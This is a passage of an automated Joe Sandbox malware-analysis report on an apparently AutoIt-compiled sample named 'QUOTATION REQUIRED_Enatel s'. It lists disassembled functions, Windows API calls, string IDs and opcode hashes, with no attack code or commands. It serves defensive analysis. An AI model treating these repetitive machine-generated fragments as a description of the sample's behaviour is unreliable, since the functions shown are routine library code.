                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                    • Opcode ID: 249aef2dbbd98d51ab24928ec47bb01e62fd69eec4c01b897d0747d9fb499afb
                                                                                                                    • Instruction ID: 3a49bf12888d66779b5eea29638381fdc1d82f31523bbb67467690329962be33
                                                                                                                    • Opcode Fuzzy Hash: 249aef2dbbd98d51ab24928ec47bb01e62fd69eec4c01b897d0747d9fb499afb
                                                                                                                    • Instruction Fuzzy Hash: 8C012D71A001146BCB14EBA4CC11DFE73A5FB423A0B04450BF866573C1EA74590CBAA2
                                                                                                                    Function 00F71BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F71C46
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                    • Opcode ID: 7a2cb259baacc2574b5a15c49fc6174885c9f46d7b9d60d182c741e9416f0685
                                                                                                                    • Instruction ID: 03f8563a0870cf88ae57b8a8f11302abc1cdc49dcf398963f01373d3d0332d68
                                                                                                                    • Opcode Fuzzy Hash: 7a2cb259baacc2574b5a15c49fc6174885c9f46d7b9d60d182c741e9416f0685
                                                                                                                    • Instruction Fuzzy Hash: 9801FC75A4010466CB05E7D4CD52EFF73A8AB11340F24001BA80A672C1EA649E0CB6F3
                                                                                                                    Function 00F71C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F71CC8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                    • Opcode ID: 948722388a183a6a366fea80026493ad28377b11428b17474a4eb164ab3070c0
                                                                                                                    • Instruction ID: ba807a6582c900a999ab07db0dffc6a2a8f119898b019e53cefbd522e83a2225
                                                                                                                    • Opcode Fuzzy Hash: 948722388a183a6a366fea80026493ad28377b11428b17474a4eb164ab3070c0
                                                                                                                    • Instruction Fuzzy Hash: 9101A775B4011866CB05EBD4CE12EFE73A8AB11350B544017B84A73281EA649F0CB6B3
                                                                                                                    Function 00F71D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00F71DD3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                    • Opcode ID: b103c4feb50a459cde5284e348f6fa0d6219f64872a3968d8c6457ef19f6311b
                                                                                                                    • Instruction ID: 8ac308212577df7be3162891a2ef0a23450e5903d03fcd29a52827bba4abb938
                                                                                                                    • Opcode Fuzzy Hash: b103c4feb50a459cde5284e348f6fa0d6219f64872a3968d8c6457ef19f6311b
                                                                                                                    • Instruction Fuzzy Hash: D7F02D71B4021876C714F7A8CC52FFF73B8BB02350F040917B866632C1DA64590CB6E2
                                                                                                                    Function 00F9747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: 3, 3, 16, 1
                                                                                                                    • API String ID: 176396367-3042988571
                                                                                                                    • Opcode ID: 7cb2bafdfae7d777239f28c19e66b1162d12c8219690308e77fbf771b53bce80
                                                                                                                    • Instruction ID: 84034bbc79905ab07daac19ba767ab3b58f2abcaa95f508c4324fb8c91d635d9
                                                                                                                    • Opcode Fuzzy Hash: 7cb2bafdfae7d777239f28c19e66b1162d12c8219690308e77fbf771b53bce80
                                                                                                                    • Instruction Fuzzy Hash: 4BE02B0262532050A731327D9CC1B7F6789CFC9770B14182BF985C2267EA9CED91B3A1
                                                                                                                    Function 00F70B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F70B23
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message
                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                    • Opcode ID: ed1781ee6de3806adc13172be91797bd4a3f57cbf74416ee4e3b91b405974d6b
                                                                                                                    • Instruction ID: 3465a23f82c9a2b3eaa0965c6e3cdd4e524cfba640cdd634c08aef8dca986bf1
                                                                                                                    • Opcode Fuzzy Hash: ed1781ee6de3806adc13172be91797bd4a3f57cbf74416ee4e3b91b405974d6b
                                                                                                                    • Instruction Fuzzy Hash: CCE0D83124431826D21037547C03F897A848F06F20F100427F758955C38EE5649076EA
                                                                                                                    Function 00F30D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F2F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F30D71,?,?,?,00F1100A), ref: 00F2F7CE
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00F1100A), ref: 00F30D75
                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F1100A), ref: 00F30D84
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F30D7F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                    • Opcode ID: 52186c3a1272bc97f7b195b2a903f275698b33f2241dc623c4e316f78dfe33c9
                                                                                                                    • Instruction ID: 1e7a23955001cf4ce6c3ac68cb2959a45474d62915aeb52e6480bf066ffbea14
                                                                                                                    • Opcode Fuzzy Hash: 52186c3a1272bc97f7b195b2a903f275698b33f2241dc623c4e316f78dfe33c9
                                                                                                                    • Instruction Fuzzy Hash: C6E06DB02003518BD3209FB8E8547467BE4AF05750F00492EE482CA656DFB5E488AB91
                                                                                                                    Function 00F83017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F8302F
                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00F83044
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                    • Opcode ID: d283c7a5e5473a4eefaef22b36c8691941134ce43fcff9a44c572d0d8ec7e9de
                                                                                                                    • Instruction ID: 15575f8535f3fb6bf7f1fefc575241d68fe69f1f0d568e20ac70ee5afb05144c
                                                                                                                    • Opcode Fuzzy Hash: d283c7a5e5473a4eefaef22b36c8691941134ce43fcff9a44c572d0d8ec7e9de
                                                                                                                    • Instruction Fuzzy Hash: 32D05EB250032867DA20A7A4AD0EFCB3BACDB05750F0002A2B696E2091DAB4D984CAD0
                                                                                                                    Function 00F6D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime
                                                                                                                    • String ID: %.3d$X64
                                                                                                                    • API String ID: 481472006-1077770165
                                                                                                                    • Opcode ID: 8e31a2b4f7c6d5615df23662b68cb07d16acd5a3dd57d6f51989aafa10508534
                                                                                                                    • Instruction ID: 163196761844471aee7d558133fe1261b4a649f67a012a7f7967a3e1c83d8587
                                                                                                                    • Opcode Fuzzy Hash: 8e31a2b4f7c6d5615df23662b68cb07d16acd5a3dd57d6f51989aafa10508534
                                                                                                                    • Instruction Fuzzy Hash: D4D012A2D08119E9CB9096D0DC55AB9B3BCAB09301F548462F806D1040E728C5087761
                                                                                                                    Function 00FA2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FA236C
                                                                                                                    • PostMessageW.USER32(00000000), ref: 00FA2373
                                                                                                                      • Part of subcall function 00F7E97B: Sleep.KERNEL32 ref: 00F7E9F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: 3e798419214da97b236ef4462a3f5bb7f8d9377113f9743293c8c6bba7e87d59
                                                                                                                    • Instruction ID: 5f6a7668ee46da97eccc00aea8a237611efc7ce661aa252ec1d2b949674f5b0f
                                                                                                                    • Opcode Fuzzy Hash: 3e798419214da97b236ef4462a3f5bb7f8d9377113f9743293c8c6bba7e87d59
                                                                                                                    • Instruction Fuzzy Hash: 7FD022723C03047BE264B730DC0FFC676149B0AB00F0049037309EA2D0C8F0B800DA84
                                                                                                                    Function 00FA2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FA232C
                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FA233F
                                                                                                                      • Part of subcall function 00F7E97B: Sleep.KERNEL32 ref: 00F7E9F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: b525ae0211ec6a2a59f223cd712a17e155b08119adbdc0b362bd0e8b27159f08
                                                                                                                    • Instruction ID: 5e0ec2c475176ec5da46ede4df462dd256d111a83897e463d50a1de4d4911db6
                                                                                                                    • Opcode Fuzzy Hash: b525ae0211ec6a2a59f223cd712a17e155b08119adbdc0b362bd0e8b27159f08
                                                                                                                    • Instruction Fuzzy Hash: DFD02276380304BBE264B730DC0FFC67A149B05B00F0049037309EA2D0C8F0A800DA80
                                                                                                                    Function 00F4BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F4BE93
                                                                                                                    • GetLastError.KERNEL32 ref: 00F4BEA1
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F4BEFC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1717984340-0
                                                                                                                    • Opcode ID: 440e1e87d09d63afc5889210e97f08a9bc82c56d00c5f8f5ad3f7ab2b1e7adbe
                                                                                                                    • Instruction ID: 45e6fe30a0f7bf5abe0cebc5cab4277e0314427fba86feda2a559b953256f567
                                                                                                                    • Opcode Fuzzy Hash: 440e1e87d09d63afc5889210e97f08a9bc82c56d00c5f8f5ad3f7ab2b1e7adbe
                                                                                                                    • Instruction Fuzzy Hash: 6041A035A04206ABDB218FA5CC44AAA7FA5AF42330F144169FD5D9B2A3DB30DD05FB60